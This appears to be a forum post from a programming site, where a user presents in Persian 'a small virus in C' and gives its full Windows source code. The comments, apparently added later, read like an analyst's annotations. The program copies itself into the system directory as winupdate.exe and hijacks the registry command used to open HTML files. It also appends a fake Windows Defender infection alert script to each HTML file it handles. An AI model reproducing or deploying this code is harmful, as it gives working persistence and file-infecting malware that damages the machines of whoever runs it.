Parsi Coders
C virus - نسخه قابل چاپ




C virus - Amin_Mansouri - 09-22-2011

اینم یه ویروس کوچولو با زبان سی :-)
کد:
#define WIN32_LEAN_AND_MEAN
#include <stdio.h>
#include <windows.h>
#include <shellapi.h>

// Text that main() appends to the file named on the command line: a newline followed by a
// <script> element whose alert() shows a fake "Windows Defender" infection warning.
// The message and the "Win32/BullMoose" name are fixed strings, so they can be used as a
// content signature when checking HTML files for this modification.
// The line below is the author's note of a "(Default)" value; presumably it is the stock data
// of the registry command value that main() overwrites (confirm against a clean host):
// (Default) "C:\Program Files\Internet Explorer\iexplore.exe" %1
const char InfectString[] = "\n<script>alert(\"Warning: This file has been detected by Windows "
"Defender to be infected with Win32/BullMoose!\");</script>";

// Entry point of the sample. Two behaviours are visible in this function:
//  1. Handler mode (exactly one argument): the file named by argv[1] gets InfectString
//     appended and is then opened in Internet Explorer.
//  2. Install steps (every run, including after handler mode, since the if-block does not
//     return): the running executable is copied into the system directory as winupdate.exe
//     and the default value of HKEY_CLASSES_ROOT\htmlfile\shell\opennew\command is replaced
//     with "<system directory>\winupdate.exe %1", so the shell starts the copy with the
//     HTML file path as its argument whenever that verb is invoked
//     (cf. MITRE ATT&CK T1546.001, Change Default File Association).
// Indicators visible in this listing: a winupdate.exe in the system directory, the changed
// command value above, and the appended <script> text at the end of HTML files.
// NOTE(review): no API return value is checked. Writing to the system directory and to this
// registry key normally requires administrative rights, so on a standard-user account the
// install steps are expected to fail silently; confirm in a sandbox.
// Always returns 0.
int main(int argc, char *argv[])
{
// handler mode: argv[1] is the path of the file passed in by the shell ("%1")
    if(argc==2) {
// FILE_ATTRIBUTE_NORMAL replaces the file's attributes, clearing e.g. read-only before the write
        SetFileAttributes(argv[1],FILE_ATTRIBUTE_NORMAL);
// open the target in text-append mode; the result is not checked for NULL
        FILE *file = fopen(argv[1],"at");
// append InfectString to the end of the target file
fputs(InfectString,file);
// close file
        fclose(file);
// show the modified file in Internet Explorer, using a hard-coded install path
        ShellExecute(NULL,"open","\"C:\\Program Files\\Internet Explorer\\iexplore.exe\"",argv[1],NULL,SW_SHOW);
    }

    char MyPath[256], CpyPath[256];
// full path of the currently running executable (NULL module handle)
    GetModuleFileName(NULL,MyPath,sizeof(MyPath));
// system directory, e.g. C:\Windows\System32
    GetSystemDirectory(CpyPath,sizeof(CpyPath));
// build the drop path: <system directory>\winupdate.exe
    strcat(CpyPath,"\\winupdate.exe");
// copy the running executable to the drop path; FALSE means an existing file is overwritten
    CopyFile(MyPath,CpyPath,FALSE);
// append the shell placeholder so the command line becomes "<drop path> %1"
    strcat(CpyPath," %1");

    HKEY Key32;// handle for the registry key opened below
// open the existing command key of the htmlfile "opennew" verb for writing (the key is opened, not created)
    RegOpenKeyEx(HKEY_CLASSES_ROOT,"htmlfile\\shell\\opennew\\command",0,KEY_WRITE,&Key32);
// the empty value name selects the key's default value; it is set to the command line built above
    RegSetValueEx(Key32,"",0,REG_SZ,CpyPath,strlen(CpyPath));
    
// close registry
RegCloseKey(Key32);

// end
    return 0;
}